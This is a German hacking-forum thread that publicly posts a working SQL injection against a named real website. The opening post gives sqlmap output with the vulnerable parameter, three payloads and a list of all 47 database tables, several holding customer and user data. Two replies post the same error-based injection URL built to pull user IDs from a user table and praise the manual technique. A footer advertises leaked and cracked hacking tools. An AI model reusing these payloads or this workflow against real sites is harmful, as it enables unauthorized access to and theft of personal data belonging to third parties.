Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

[SQLi] wui-diegruenen.at

- - - - -

  • Bitte melde dich an um zu Antworten
2 Antworten in diesem Thema

#1
Ch!ller

Ch!ller

    Shinigami

  • SubMod
  • PIPPIPPIPPIPPIPPIPPIPPIPPIPPIP
  • Likes
    958
  • 896 Beiträge
  • 1386 Bedankt
  • Spender
  • verifiziert

http://www.wui-diegruenen.at/index.php?bid=24&site=themen&page=36
Parameter: bid (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: bid=24' RLIKE (SELECT (CASE WHEN (4717=4717) THEN 24 ELSE 0x28 END)) AND 'kQoE'='kQoE&site=themen&page=36

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: bid=24' AND (SELECT 8625 FROM(SELECT COUNT(*),CONCAT(0x717a707a71,(SELECT (ELT(8625=8625,1))),0x7178786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'gkCW'='gkCW&site=themen&page=36

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: bid=24' AND SLEEP(5) AND 'xnxH'='xnxH&site=themen&page=36
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0
available databases [2]:
[*] information_schema
[*] wuidiegr_01

Database: wuidiegr_01
[47 tables]
+-------------------------+
| ajaxchat                |
| ajaxchat_user           |
| cm_bestellt             |
| cm_kunden               |
| cm_kurs_kunde           |
| cm_kurse                |
| cm_produkte             |
| emailaktionen           |
| emailaktionen_supporter |
| forum_bereiche          |
| forum_bereiche_user     |
| forum_comments          |
| forum_comments_posts    |
| forum_kategorien        |
| forum_kategorien_mods   |
| forum_kats_user         |
| forum_posts             |
| forum_posts_threads     |
| forum_threads           |
| forum_threads_kats      |
| frogos                  |
| gallery_anz             |
| gallery_fotos           |
| gallery_ordner          |
| group_rights            |
| news                    |
| newsletter              |
| newsletter_analytics    |
| newsletter_recipients   |
| newsletter_recipients_  |
| newsletter_rows         |
| pms                     |
| poll                    |
| poll_antworten          |
| poll_cookie             |
| settings                |
| statistik               |
| statistik_links         |
| thema                   |
| thema_bereich           |
| thema_gelesen           |
| themen_bereiche         |
| user_can                |
| user_hobbys             |
| user_must               |
| user_online             |
| user_sites              |
+-------------------------+
  • smc2014 und 3even gefällt das
Alle Angaben und Informationen dienen lediglich der Theorie!

#2
SecurityFlaw

SecurityFlaw

    ██████████

  • Members
  • PIPPIPPIPPIPPIPPIPPIPPIPPIP
  • Likes
    213
  • 256 Beiträge
  • 112 Bedankt
  • Android, Android [root]
  • Windows, Linux

lnzkmb5.png

 

Geht ebenfalls hier:

http://www.wui-diegruenen.at/index.php?site=home'||(SELECT 'x' FROM DUAL WHERE 1=1 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x3e,(SELECT MID((IFNULL(CAST(`user-id` AS CHAR),0x20)),1,100) FROM wuidiegr_01.user_must ORDER BY `user-id` LIMIT 0,1),0x3c00,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'

  • smc2014 gefällt das

#3
pi^2

pi^2

    Hacker

  • Premium Member
  • Likes
    273
  • 181 Beiträge
  • 46 Bedankt

 

lnzkmb5.png

 

Geht ebenfalls hier:

http://www.wui-diegruenen.at/index.php?site=home'||(SELECT 'x' FROM DUAL WHERE 1=1 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x3e,(SELECT MID((IFNULL(CAST(`user-id` AS CHAR),0x20)),1,100) FROM wuidiegr_01.user_must ORDER BY `user-id` LIMIT 0,1),0x3c00,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'

 

ich sehe immernoch manuell unterwegs .. hut ab!


  • smc2014 und SecurityFlaw gefällt das



  Thema Forum Themenstarter Statistik Letzter Beitrag

Dieses Thema wurde von 43 Mitglied(ern) gelesen


    3even, bebekid32, Bot4ng, C4shin0ut, Ch!ller, cyb3rfly, CyberFlash, DeepWater, desmond, Dr. Spic, Exynos, fl4shx, Framerater, Freshness28, FrogPussyGreen, gr33d, gtawelt, headshotde, herp, IRET, Island, JohnR, kiwitone, kleinkriminell, leonalexkraus, Makiavelic, mantwohouse, matrix567, mesagio, MiD_NiGHT, motory, nibble nibble, Osed28, p.samson, pepeSito, pi^2, ProHex, R3V3R53, SecurityFlaw, smc2014, Xenos88, xodiak, z91
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.